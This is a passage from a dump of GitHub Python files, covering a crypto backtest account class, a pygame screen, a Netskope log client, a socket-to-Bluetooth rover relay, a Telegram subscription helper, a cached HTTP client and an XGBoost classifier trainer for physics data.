info['type']\n\n                self.add_info(order_info)\n\n        else:\n            print('no signal occurred')\n        return {}\n\n    # append the order info\n    def add_info(self, order_dict):\n        self.historyOrder_list.append(order_dict)\n\n    def handle_balance(self, info_dict):\n        first_coin = info_dict['symbol'][0:3]\n        end_coin = info_dict['symbol'][-3:]\n        symbol_coin = first_coin + end_coin\n        # print(first_coin, end_coin)\n        if info_dict['side'] == 'buy':\n            # self.balance_dict['BTC'] += float(info_dict['amount'])\n            self.balance_dict[first_coin] += float(info_dict['amount']) * float(1 - self.buy_fee)\n            self.balance_dict[end_coin] -= float(info_dict['amount']) * float(info_dict['price'])\n\n            self.csv_signal_dict[info_dict['date_time']] = 'buy'\n            self.csv_amount_dict[info_dict['date_time']] = float(info_dict['amount'])\n\n            self.buy_openPrice_dict[info_dict['date_time']] = info_dict['price']\n\n        else:\n            self.balance_dict[end_coin] += float(info_dict['amount']) * float(info_dict['price'])\n            self.balance_dict[first_coin] -= float(info_dict['amount']) * float(1 - self.sell_fee)\n            # self.balance_dict['BTC'] -= float(info_dict['amount'])\n            self.csv_signal_dict[info_dict['date_time']] = 'sell'\n            self.csv_amount_dict[info_dict['date_time']] = float(info_dict['amount'])\n            self.sell_openPrice_dict[info_dict['date_time']] = info_dict['price']\n\n        pprint(self.balance_dict)\n\n        # convert everything into the end_coin value\n        info = {} # stores the difference between the current and the initial balances\n        for 
sym, val in self.cash.items():\n            for new_sym, new_val in self.balance_dict.items():\n                # print('cash', self.cash)\n                # print('balance', self.balance_dict)\n                if sym == new_sym:\n                    info[sym] = float(new_val) - float(val)\n        print('difference', info)\n\n        self.end_balance = 0\n        for _key, _val in info.items():\n            if _key == first_coin:\n                self.end_balance += float(self.today_symbol_price[symbol_coin]) * float(_val)\n            elif _key == end_coin:\n                self.end_balance += float(_val)\n            else:\n                pass\n        # print(info_dict)\n        # print(end_balance)\n\n\n    # convert into a single fund unit\n    def to_fund(self):\n        if self.end_balance == 0:\n\n            self.btc_balance.append(0)\n        else:\n            self.btc_balance.append(self.end_balance)\n        # based on the initial amount, with BTC as the settlement instrument\n        # info = {} # stores the difference between the current and the initial balances\n        # for sym, val in self.cash.items():\n        #     for new_sym, new_val in self.balance_dict.items():\n        #         print('cash', self.cash)\n        #         print('balance', self.balance_dict)\n        #         if sym == new_sym:\n        #             info[sym] = float(new_val) - float(val)\n        # print('difference', info)\n\n\n\n\n        # exit()\n        # self.today {key :symbol_list}\n        # info: the individual differences\n\n        # btc_list = []\n        # for sy, va in info.items():\n        #     if sy != 'BTC':\n        #         for symbol, price in self.today_symbol_price.items():\n        #             if sy == symbol and sy != 'USD':\n        #                 _btc = float(va) * float(price)\n        #                 btc_list.append(_btc)\n        #             elif sy == symbol and sy == 'USD':\n        #                 _btc = float(price) / float(va)\n        #                 btc_list.append(_btc)\n        #             else:\n        #                 pass\n        #     else:\n        #         btc_list.append(va)\n        # btc_balance = sum(btc_list)\n        #\n        # self.btc_balance.append(self.cash['BTC'] + btc_balance)\n        # print('converted to btc', self.btc_balance)\n\n        # exit()\n\n    # settlement on the last day\n    def lastday_balance(self):\n        # convert everything into the end_coin value\n        info = {} # stores the difference between the current and the initial balances\n        for sym, val in self.cash.items():\n            for new_sym, new_val in self.balance_dict.items():\n                # print('cash', self.cash)\n                # print('balance', self.balance_dict)\n                if sym == new_sym:\n                    info[sym] = float(new_val) - float(val)\n        print('last-day difference', info)\n\n        symbol_coin = self.symbol_list[0]\n        first_coin = symbol_coin[0:3]\n        end_coin = symbol_coin[-3:]\n        # print(first_coin, end_coin)\n        # exit()\n        self.end_balance = 0\n        for _key, _val in info.items():\n            if _key == first_coin:\n                self.end_balance += float(self.today_symbol_price[symbol_coin]) * float(_val)\n            elif _key == end_coin:\n                self.end_balance += float(_val)\n            else:\n                pass\n        print(self.end_balance)\n        self.btc_balance.remove(self.btc_balance[-1])\n        self.btc_balance.append(self.end_balance)\n\n\n        # ######### last-day settlement: how much volume can be accommodated #########\n        for _key, _val in self.csv_balance_dict.items():\n            symbol_coin = self.symbol_list[0]\n\n            if self.symbol_list[0][0:3] == _key:\n\n                first_abs = max([abs(i) for i in self.csv_balance_dict[_key]])\n                self.allow_min_coin_dict[_key] = first_abs\n                val1 = first_abs * self.firstday_symbol_price[symbol_coin]\n                # print(first_abs)\n            elif self.symbol_list[0][-3:] == _key:\n                end_abs = max([abs(i) for i in self.csv_balance_dict[_key]])\n                self.allow_min_coin_dict[_key] = end_abs\n                val2 = end_abs\n                # print(end_abs)\n            else:\n                pass\n\n        # minimum allowed amount of currency\n        min_cash = val1 + val2\n        # print(min_cash)\n        self.para_allowCash = min_cash\n\n    # process the data\n    def handle_data(self, data_dict=None, today=None, price_type=None):\n\n        # take one dataset as the sample to iterate over  TODO change later\n        data = data_dict[list(data_dict.keys())[0]]\n\n\n        self.csv_time_list = data.index\n        self.csv_dataPrice_list = data[data.columns[0]].tolist()\n\n        # create a strategy instance\n        s = Strategy(account=self, strategy_arg=self.strategy_arg)\n\n        for i in range(len(data)):\n            if i == 0:\n                for _key in data_dict.keys():\n                    self.firstday_symbol_price[_key] = data_dict[_key][data_dict[_key].columns[0]][0]\n\n            # 
set the per-bar variable values\n            today = data.index[i] # timestamp\n            print(type(today))\n            # exit()\n            # today_str = datetime.datetime.strftime(today, \"%Y-%m-%d %H:%M:%S\")\n            price = data[data.columns[0]][i]\n\n            # TODO get today's price for each symbol in symbol_list, to later convert into the initial unit\n            for _key in data_dict.keys():\n                self.today_symbol_price[_key] = data_dict[_key][data_dict[_key].columns[0]][i]\n\n            # pass the historical data up to today into the strategy instance\n            before_data = self.get_before_data(data, i)\n\n            info_d = {}\n            info_d['before_data'] = before_data\n            info_d['dataLen'] = i # record the data length\n\n            # get the trading signal\n            info = s.get_signal(info_d)\n            print('current time {} - price {}'.format(today, price))\n\n            # process the signal and consolidate the info\n            self.handle_signal(info, data, i)\n\n            # iterate over the market orders\n            for signal_dict in self.historyOrder_list:\n                if today == signal_dict['date_time']:\n                    self.handle_balance(signal_dict)\n\n            # iterate over the limit orders\n            for limit_order_index in range(len(self.historyLimitOrder_list)):\n                if self.historyLimitOrder_list[limit_order_index]['side'] == 'buy':\n                    if price >= self.historyLimitOrder_list[limit_order_index]['price']:\n                        print('executing limit order -- buy')\n                        self.handle_balance(self.historyLimitOrder_list[limit_order_index])\n                        self.historyLimitOrder_list.remove(self.historyLimitOrder_list[limit_order_index])\n\n                else:\n                    if price <= self.historyLimitOrder_list[limit_order_index]['price']:\n                        print('executing limit order -- sell')\n                        self.handle_balance(self.historyLimitOrder_list[limit_order_index])\n                        self.historyLimitOrder_list.remove(self.historyLimitOrder_list[limit_order_index])\n\n            # execute closing trades\n            self.MA = s.MA\n            # update the balances\n            for symbol in self.balance_dict.keys():\n                l = self.csv_balance_dict[symbol]\n                vol = copy.deepcopy(self.balance_dict)\n\n                ll = copy.deepcopy(self.csv_balance_dict[symbol])\n                ll.append(vol[symbol])\n                self.csv_balance_dict[symbol] = ll\n\n            print(self.csv_balance_dict)\n            # TODO add related info to support visualization output\n            self.to_fund()\n            # exit()\n\n        # settle on the last trading day\n        self.lastday_balance()\n\n\n\n\n\nif __name__ == '__main__':\n    pass","repo_name":"DreamXinxin/BT","sub_path":"Account/accountSpot.py","file_name":"accountSpot.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14282061653","text":"import pygame\nfrom classes.default import defaultStatus\n\nclass Death:\n    def __init__(self, status, screen):\n        self.font = pygame.font.Font(None, 50)\n        self.font1 = pygame.font.Font(None, 30)\n        self.background = pygame.image.load('assets/gameOver.png')\n        self.title, self.score, self.wave = \"\", \"\", \"\"\n        self.playBtn = pygame.Rect((345, 600), (505,60))\n        self.status = status\n        self.screen = screen\n\n    def run(self, window):\n        '''Calls all the functions needed to render this screen.'''\n        self.draw()\n        self.getEvents(window)\n\n    def getEvents(self, window):\n        '''Receives player input. 
Resets the status and the Game screen to start a new game.'''\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                self.status[\"running\"] = False\n            if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n                self.status[\"current\"] = \"start\" \n                defaultStatus(self.status)\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                mouse = pygame.mouse.get_pos()\n                if self.playBtn.collidepoint(mouse):\n                    self.status[\"current\"] = \"start\" \n                    defaultStatus(self.status)\n    \n    def draw(self):\n        '''Draws the game status indicators on the screen.'''\n        self.textRender()\n        self.screen.blit(self.background,(0,0))\n        self.screen.blit(self.wave,(815,543))\n        self.screen.blit(self.score,(765,443))\n        self.screen.blit(self.time,(700,494))\n    \n    def textRender(self):\n        '''Renders the title and the score and time indicators.'''\n        self.score = self.font.render(str(self.status[\"destroyedMeteor\"]), False, (255, 255, 255))\n        self.time = self.font.render(str(self.status[\"gameDuration\"]), False, (255, 255, 255))\n        self.wave = self.font.render(str(self.status[\"wave\"]), False, (255, 255, 255))","repo_name":"juliapaiva1/Astrobirds","sub_path":"screens/death.py","file_name":"death.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31611577037","text":"\"\"\" This module defines the EventClient class which adds the following\nto the inherited BaseNetskopeClient class: log types (self.type_list),\nendpoint type (self.endpoint_type), and the URL endpoint used to pull\nlogs for Netskope Events.\n\"\"\"\n\nimport os\n\nfrom netskope_fetcher.base import BaseNetskopeClient\n\n\nclass EventClient(BaseNetskopeClient):\n\n    \"\"\" Holds information to be used when pulling down 'Event' logs.\n\n    Inherits\n    ----------\n    BaseNetskopeClient\n\n    Attributes\n    ----------\n    type_list: list\n        The various types of logs that can be pulled down from Netskope\n        according to Netskope documentation.\n        https://valvoline.eu.goskope.com/docs/Netskope_Help/en/\n        rest-api/http-endpoints.html\n    endpoint_type: str\n        The netskope rest endpoint that this object relates to.\n    url: str\n        The URL of the endpoint\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        self.type_list = [\"page\", \"application\", \"audit\", \"infrastructure\"]\n        self.endpoint_type = \"event\"\n\n        url = kwargs.get(\"url\", None)\n\n        self.url = url or (\n            \"https://{}.eu.goskope.com/api/v1/events\"\n            \"\".format(os.environ[\"NETSKOPE_TENANT_NAME\"])\n        )\n","repo_name":"IntegralDefense/netskope_log_fetcher","sub_path":"netskope_fetcher/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33042040949","text":"# external modules\r\nimport socket\r\nimport sys\r\nimport time\r\nimport serial\r\nimport os\r\nimport time\r\nimport numpy as np\r\nimport threading\r\nimport subprocess\r\n\r\n# internal modules\r\nimport sys\r\nsys.path.append(\"../common/\")\r\nfrom NetworkHandler import *\r\n\r\nclass Rover:\r\n    \"\"\"\r\n    A Class for handling communication with the Server operating\r\n    externally.\r\n    \"\"\"\r\n\r\n    def start(self, ip='192.168.100.14', port=6909):\r\n    # def start(self, ip='192.168.43.22', port=6909):\r\n        \"\"\"\r\n        Kickstarts the rover.\r\n        - Creates socket\r\n        - Sends connection request to Server\r\n        - Once connected, performs the following in parallel:\r\n            - calls listen()\r\n        \"\"\"\r\n        
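# NOTE: this sketch assumes /dev/rfcomm0 is already bound to the paired Bluetooth device (e.g. via 'rfcomm bind') before start() runs\r\n        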
try:\r\n            self.bluetooth_port = serial.Serial('/dev/rfcomm0',9600)\r\n            self.rover_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n            self.rover_socket.connect((ip,port))\r\n            #self.flask_server = subprocess.Popen(['python3', 'rover/flask-server.py'])\r\n            self.messagesListenerThread = threading.Thread(target=self.handle_incoming_messages)\r\n            self.messagesListenerThread.start()\r\n            self.messagesListenerThread.join()\r\n        finally:\r\n            self.cleanUp()\r\n\r\n    def handle_incoming_messages(self):\r\n        \"\"\"\r\n        Listens for messages from the Server.\r\n        \"\"\"\r\n        while True:\r\n            message = NetworkHandler().receive(self.rover_socket)\r\n            if message:\r\n                print(message)\r\n                self.bluetooth_port.write(message)\r\n            else:\r\n                return\r\n\r\n    def cleanUp(self):\r\n        \"\"\"\r\n        Closes Connections.\r\n        \"\"\"\r\n        try:\r\n            if self.rover_socket is not None:\r\n                self.rover_socket.close()\r\n            if self.bluetooth_port is not None:\r\n                self.bluetooth_port.close()\r\n        except Exception as e:\r\n            print(e)\r\n\r\nrover = Rover()\r\nrover.start()\r\n\r\n","repo_name":"amm98d/scout-rover","sub_path":"rover/rover.py","file_name":"rover.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43164669663","text":"import os, django\r\nimport sys\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"config.settings\")\r\ndjango.setup()\r\nimport asyncio\r\nfrom models.models import User\r\n\r\n\r\nasync def add_service(user_login, service): # adds a service\r\n    user = User.objects.get(tgid=user_login) # fetch the user row with our tgid into the user variable\r\n    subs = user.subscribes # get their subscriptions into the subs variable\r\n    subs = subs + \" \" + service + \",\" # append our new service to the string\r\n    user.subscribes = subs # assign the updated string back to the subscriptions field\r\n    user.save() # save\r\n\r\n\r\nasync def remove_service(user_login, service): # removes a service\r\n    user = User.objects.get(tgid=user_login)\r\n    subs = user.subscribes\r\n    subs = subs.split(service+\",\")\r\n    subs = str(subs[0]+subs[1])\r\n    print(subs)\r\n    user.subscribes = subs\r\n    user.save()\r\n\r\n\r\n\r\n# asyncio.run(add_service(975083397, \"bmstu\"))","repo_name":"Morzan6/university-checker","sub_path":"university-checker/tgbot/add_remove_service.py","file_name":"add_remove_service.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"42154943261","text":"import requests\nimport json\nfrom requests.exceptions import ConnectionError\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\nimport requests_cache\n\n\n\nDEFAULT_TIMEOUT = 5 # seconds\n\nclass TimeoutHTTPAdapter(HTTPAdapter):\n    def __init__(self, *args, **kwargs):\n        self.timeout = DEFAULT_TIMEOUT\n        if \"timeout\" in kwargs:\n            self.timeout = kwargs[\"timeout\"]\n            del kwargs[\"timeout\"]\n        super().__init__(*args, **kwargs)\n\n\n\nclass BaseClient:\n\n    def _get_session(self, token):\n        session = requests.Session()\n        session.headers.update({\n            'Content-Type': 'application/json',\n            'Authorization': token,\n        })\n        return session\n\n    def _get_cached_session(self, token):\n        session = requests_cache.CachedSession('client_cache')\n        session.headers.update({\n            'Content-Type': 'application/json',\n            'Authorization': token,\n        })\n        return session\n\n\n    def 
_request_get(self, url, token, timeout = 5, retry = 5 , ttl = None):\n session = self._get_cached_session(token)\n\n adapter_time = TimeoutHTTPAdapter(timeout=timeout)\n adapter_retry = HTTPAdapter(max_retries=Retry(total=retry))\n\n session.mount(\"https://\", adapter_retry)\n session.mount(\"https://\", adapter_time)\n \n try:\n response = session.get(url, expire_after=ttl)\n \n except ConnectionError:\n return False\n\n return response\n\n def _request_post(self, url, token, timeout = 5, retry = 5, data = None):\n session = self._get_session(token)\n\n adapter_time = TimeoutHTTPAdapter(timeout=timeout)\n adapter_retry = HTTPAdapter(max_retries=Retry(total=retry))\n\n session.mount(\"https://\", adapter_retry)\n session.mount(\"https://\", adapter_time)\n try:\n response = session.post(url, data = json.dumps(data))\n \n except ConnectionError:\n return False\n\n return response\n\n","repo_name":"Lucas-loliveira/iclinic-challenge","sub_path":"prescriptions/serializers/client/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70572460692","text":"import pandas as pd\nimport numpy as np\nimport math\nfrom copy import copy\nfrom .xgboost2tmva import *\nimport seaborn as sns\n\nfrom sklearn.metrics import roc_auc_score, roc_curve, accuracy_score\nimport xgboost as xg\nfrom sklearn.model_selection import GridSearchCV\n\nfrom hyperopt import hp\nfrom hyperopt import fmin, tpe, rand,STATUS_OK, STATUS_FAIL,space_eval,Trials\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\nfrom .ntuple_meta import *\n\n\nimport matplotlib.pyplot as plt\n\n\ndef MetricFunc(S,B,Br=10,std=False):\n if std:\n return S/np.sqrt(S+B)\n else:\n return math.sqrt(2*((S+B+Br)*math.log(1+(S/(B+Br)))-S))\n\n\nclass train_bdt():\n def __init__(self, *args, **kwargs):\n\n\n self.data = kwargs['data'] \n self.sig_name = kwargs['signal'][0]\n self.bkg_name = kwargs['background'][0]\n self.queryString = kwargs['queryString']\n self.params = kwargs['params']\n self.df,self.signal,self.background = self.prepareSB(self.data,[self.sig_name],[self.bkg_name],self.queryString)\n \n if 'prune' in kwargs:\n print(\"pruning variables with high correlation\")\n self.bdt_vars = self.prune_variables(self.signal,kwargs['bdt_vars'],kwargs['prune'])\n else:\n self.bdt_vars = kwargs['bdt_vars']\n \n\n\n trainFrac = 0.8\n validFrac = 0.1\n \n\n np.random.seed(1234)\n theShape = self.df.shape[0]\n ShuffleDF = np.random.permutation(theShape)\n TrainLimit = int(theShape*trainFrac)\n ValidLimit = int(theShape*(trainFrac+validFrac))\n\n\n X = self.df[self.bdt_vars].values\n Y = self.df['proc'].values\n weight = self.df['weight'].values\n\n\n #Shuffle stuff around\n X = X [ShuffleDF]\n Y = Y [ShuffleDF] \n weight = weight [ShuffleDF] \n\n\n #Splitting for training and validation\n TrainX,ValidX,TestX = np.split(X,[TrainLimit,ValidLimit])\n TrainY,ValidY,TestY = np.split(Y,[TrainLimit,ValidLimit])\n TrainW,ValidW,TestW = np.split(weight,[TrainLimit,ValidLimit])\n\n self.TrainX,self.ValidX,self.TestX = TrainX,ValidX,TestX\n self.TrainY,self.ValidY,self.TestY = TrainY,ValidY,TestY\n self.TrainW,self.ValidW,self.TestW = TrainW,ValidW,TestW \n \n training = xg.DMatrix(TrainX,label = TrainY, weight = TrainW,feature_names = self.bdt_vars)\n testing = xg.DMatrix(TestX, label = TestY , weight = TestW, feature_names = self.bdt_vars)\n validating = xg.DMatrix(ValidX, label = ValidY , weight = ValidW, 
feature_names = self.bdt_vars)\n\n self.training_data = training\n self.testing_data = testing\n self.validating_data = validating\n\n \n\n\n # pass\n\n def prune_variables(self,df, init_vars,plot=False):\n cormat = df[init_vars].corr()\n if plot:\n plt.figure(figsize=(32, 12))\n sns.heatmap(cormat,annot=True)\n \n corr = cormat\n columns = np.full((corr.shape[0],), True, dtype=bool)\n for i in range(corr.shape[0]):\n for j in range(i+1, corr.shape[0]):\n if corr.iloc[i,j] >= 0.9 or corr.iloc[i,j] <= -0.9 :\n if columns[j]:\n columns[j] = False\n \n \n selected_column = df[init_vars].columns[columns]\n \n if plot:\n cormat = df[selected_column].corr()\n plt.figure(figsize=(32, 12))\n sns.heatmap(cormat,annot=True)\n \n return selected_column\n\n\n def get_sample_size(self):\n return (self.TrainX.shape[0],self.ValidX.shape[0],self.TestX.shape[0])\n\n def AUC(self,quite=True):\n self.train_auc = roc_auc_score(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n self.test_auc = roc_auc_score(self.TestY, self.PredY_test, sample_weight=self.TestW)\n self.valid_auc = roc_auc_score(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n self.STXS_mva_auc = roc_auc_score(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight)\n if (not quite):\n print ('Default training performance:')\n print ('area under roc curve for training set = %1.3f'%( self.train_auc) )\n print ('area under roc curve for test set = %1.3f'%( self.test_auc ) )\n print ('area under roc curve for validity set = %1.3f'%( self.valid_auc ) )\n print ('area under roc curve for STXS MVA = %1.3f'%( self.STXS_mva_auc ) )\n pass\n\n\n\n\n\n def ROC(self):\n #Plotting\n # plt.figure(1)\n self.train_auc = roc_auc_score(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n self.test_auc = roc_auc_score(self.TestY, self.PredY_test, sample_weight=self.TestW)\n self.valid_auc = roc_auc_score(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n \n\n\n f,ax = plt.subplots(figsize=(8,8))\n\n bkgEff, sigEff, nada = roc_curve(self.TrainY, self.PredY_train, sample_weight=self.TrainW)\n ax.plot(bkgEff, sigEff,label=f'Train:{self.TrainX.shape[0]}; AOC = {round(self.train_auc,3)}')\n\n bkgEff, sigEff, nada = roc_curve(self.TestY, self.PredY_test, sample_weight=self.TestW)\n ax.plot(bkgEff, sigEff,label=f'Test:{self.TestX.shape[0]}; AOC = {round(self.test_auc,3)}')\n\n bkgEff, sigEff, nada = roc_curve(self.ValidY, self.PredY_valid, sample_weight=self.ValidW)\n ax.plot(bkgEff, sigEff,label=f'Valid:{self.ValidX.shape[0]}; AOC = {round(self.valid_auc,3)}')\n\n\n #WH_MVA\n bkgEff, sigEff, nada = roc_curve(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight)\n vh_mva_aoc = roc_auc_score(self.df.proc, self.df.vh_mva, sample_weight=self.df.weight) \n ax.plot(bkgEff, sigEff,label=f'STXS MVA AOC={round(vh_mva_aoc,3)}')\n\n plt.legend(loc='lower right')\n plt.title(f\"{self.sig_name }\")\n plt.xlabel('Background efficiency')\n plt.ylabel('Signal efficiency')\n\n\n\n def MVA_plt(self, AMS=False):\n\n f,ax = plt.subplots(figsize=(8,8))\n binx = np.linspace(0.0,1,50)\n\n\n\n\n\n def get_mva_local(X,weight):\n data = xg.DMatrix(X, feature_names=self.bdt_vars,weight = weight)\n return self.model.predict(data)\n\n\n def test_train_valid(signal= 1):\n test_train_valid = (\n get_mva_local(self.TrainX[self.TrainY == signal],self.TrainW[self.TrainY == signal])\n ,get_mva_local(self.TestX[self.TestY == signal],self.TestW[self.TestY == signal])\n ,get_mva_local(self.ValidX[self.ValidY == signal],self.ValidW[self.ValidY == signal]) \n 
)\n\n train = test_train_valid[0]\n test = test_train_valid[1]\n valid = test_train_valid[2]\n\n test_train_valid_weight = (\n self.TrainW[self.TrainY == signal],\n self.TestW[self.TestY == signal],\n self.ValidW[self.ValidY == signal])\n\n\n\n if signal:\n test_train_valid_colors = (\n 'green',\n \"mediumspringgreen\",\n \"lightseagreen\"\n )\n test_train_valid_labels = (\n \" Signal Train\",\n 'Signal Test',\n \"Signal Valid\"\n )\n else:\n test_train_valid_colors = (\n \"tomato\",\n 'lightsalmon',\n \"darkorange\"\n )\n test_train_valid_labels = (\n \"Background Train\",\n 'Background Test',\n \"Background Valid\" \n )\n\n\n\n # _=ax.hist(test_train_valid\n # ,bins=binx\n # ,linewidth=2\n # # ,histtype='step'\n # ,stacked=True\n # ,label=test_train_valid_labels\n\n # ,color=test_train_valid_colors\n # ,weights = test_train_valid_weight\n # # ,density=1\n # )\n\n\n counts,bins = np.histogram(\n test,\n bins=binx,\n weights= test_train_valid_weight[1],\n density = 1\n ) \n\n counts_err,bins = np.histogram(\n test,\n bins=binx,\n # weights= test_train_valid_weight[1],\n ) \n\n\n\n if (signal):\n color = 'blue'\n else:\n color = 'red'\n\n x_points = bins[:-1] + 0.5*(bins[1]-bins[0])\n _=ax.errorbar(\n x_points[counts > 0],\n counts[counts >0],\n fmt='o',\n yerr = 1/(np.sqrt(counts_err[counts >0])),\n label = test_train_valid_labels[1],\n color = color,\n ecolor = 'k',\n capsize = 1.5\n )\n\n\n\n\n\n\n def calc_ams(df):\n def get_ams(df,metric_cut):\n dff = copy(df[df.anom_mva > metric_cut])\n sig = dff[dff.proc==1]\n bkg = dff[dff.proc==0]\n ams = MetricFunc(np.sum(sig.weight),np.sum(bkg.weight),std=False)\n return ams\n X,Y = [],[]\n for i in np.linspace(0,1,50):\n X.append(i)\n Y.append(get_ams(df,i))\n ax2 = ax.twinx()\n max_indx = Y.index(max(Y))\n # ax2.axvline(X[max_indx],\n # ymin=max(Y)-2,\n # ymax = max(Y)+2,\n # color='red'\n # )\n ax2.plot(X,Y,'r-.',linewidth=3,label=f'AMS max = {round(X[max_indx],2)},{round(Y[max_indx],2)}')\n ax2.set_ylabel('AMS')\n ax2.set_ylim(0,20)\n\n legend_kargs = {\n \"bbox_to_anchor\":(.375, .8),\n # \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True\n }\n _=ax2.legend(**legend_kargs)\n # _=ax2.grid()\n\n\n\n \n legend_kargs = {\n # \"bbox_to_anchor\":(.5, 1),\n \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True,\n 'ncol':2\n }\n \n\n\n #Signal\n\n\n\n test_train_valid(signal= 1)\n _=ax.hist(self.get_mva(self.signal)\n ,bins=binx\n ,linewidth=2\n # ,histtype='step'\n ,label=anom_labels[self.sig_name]\n # ,color='darkgreen'\n ,fc=(0,0,1,.5)\n ,weights = self.signal.weight\n ,density=1\n )\n _=ax.hist(self.get_mva(self.signal)\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n # ,label=WHanom_label[self.sig_name]\n ,color='blue'\n # ,fc=(0,0,1,.5)\n ,weights = self.signal.weight\n ,density=1\n )\n\n\n test_train_valid(signal= 0)\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n # ,histtype='step'\n ,label=anom_labels[self.bkg_name]\n # ,color='maroon'\n ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n ,density=1\n )\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n # ,label=WHanom_label[self.bkg_name]\n ,color='red'\n # ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n ,density=1\n )\n\n\n\n \n _=ax.legend(**legend_kargs)\n\n if (AMS):\n f,ax = plt.subplots(figsize=(8,8))\n _=ax.hist(self.get_mva(self.background)\n ,bins=binx\n ,linewidth=2\n 
,histtype='step'\n # ,label=WHanom_label[self.bkg_name]\n ,color='red'\n # ,fc=(1,0,0,.5)\n ,weights = self.background.weight\n )\n\n\n calc_ams(self.df)\n _=ax.set_xlabel(r\"ANOM MVA\",fontsize=20)\n \n\n _=ax.set_ylabel(r\"Events\",fontsize=15)\n _=ax.set_xlabel(r\"BDT MVA\",fontsize=15)\n\n # _=plt.axvline(125,color='red',linestyle=\"--\")\n # _=plt.legend(**legend_kargs)\n _=plt.title(f\"{self.sig_name}\")\n # _=plt.text(140, 0.25, \"Weighted\",fontsize=15)\n # _=plt.grid()\n # _=plt.ylim(0,20)\n\n\n \n\n def get_mva(self, df):\n X = df[self.bdt_vars].values\n weight = df['weight'].values\n data = xg.DMatrix(X, feature_names=self.bdt_vars,weight = weight)\n return self.model.predict(data)\n\n \n def prepareSB(self,data,sigs,bkgs,queryString): #Get Background and Signal\n #preparing signal data\n sig_data = []\n for sig in sigs:\n print(sig)\n sig_data.append(data[sig])\n \n signal = pd.concat(sig_data,axis=0)\n signal['proc'] = np.ones(signal.shape[0])\n \n bkg_data = []\n for bkg in bkgs:\n bkg_data.append(data[bkg])\n \n background = pd.concat(bkg_data,axis=0)\n background['proc'] = np.zeros(background.shape[0])\n all_data = pd.concat((signal,background),axis=0)\n # all_data = all_data.query(queryString)\n return all_data,signal,background\n\n\n def hyperOpt(self,space,max_evals=100): \n self.trials = Trials()\n def fn(para):\n model = xg.train(para,self.training_data)\n# PredY_train = model.predict(self.training_data)\n# loss = -1*roc_auc_score(self.TrainY, PredY_train, sample_weight=self.TrainW) \n PredY_test = model.predict(self.testing_data)\n loss = -1*roc_auc_score(self.TestY, PredY_test, sample_weight=self.TestW) \n # print(para['colsample_bytree'])\n return {'loss': loss, 'status':STATUS_OK}\n\n result = fmin(fn=fn, space=space, algo=tpe.suggest,trials = self.trials ,max_evals=max_evals)\n \n self.HyperResult = space_eval(space,result)\n \n \n\n def train(self, params='default'):\n if params == 'default':\n params=self.params\n self.model = xg.train(params,self.training_data)\n self.PredY_train = self.model.predict(self.training_data)\n self.PredY_test = self.model.predict(self.testing_data)\n self.PredY_valid = self.model.predict(self.validating_data)\n self.df['anom_mva'] = self.get_mva(self.df)\n\n\n def train_classifier(self):\n params = self.params\n mdl = xg.XGBClassifier()\n self.model = mdl.fit(self.TrainX,self.TrainY,sample_weight= self.TrainW)\n self.PredY_train = self.model.predict(self.TrainX)#,sample_weight= self.TrainW)\n self.PredY_test = self.model.predict(self.TestX)#,sample_weight= self.TestW)\n self.PredY_valid = self.model.predict(self.ValidX)#, sample_weight= self.ValidW)\n \n\n # def train(self, params='default'):\n # if params == 'default':\n # params=self.params\n\n # self.model = xg.\n\n def plot_feature_importance(self):\n xgb.plot_importance(self.model,title=self.sig_name)\n \n\n def plot_var(self,var,binx=100,queryString=\"\"):\n f,ax = plt.subplots(figsize=(8,8))\n # binx = 100\n\n if queryString != \"\":\n sig = self.signal.query(queryString)[var]\n sig_weight = self.signal.query(queryString)['weight']\n bkg = self.background.query(queryString)[var]\n bkg_weight = self.background.query(queryString)['weight']\n else:\n sig = self.signal[var]\n sig_weight = self.signal['weight']\n bkg = self.background[var]\n bkg_weight = self.background['weight']\n \n\n\n _=ax.hist(sig\n ,bins=binx\n ,linewidth=2\n ,histtype='step'\n ,label=WHanom_label[self.sig_name]\n ,color='darkgreen'\n ,weights = sig_weight\n # ,density=1\n )\n\n\n _=ax.hist(bkg\n 
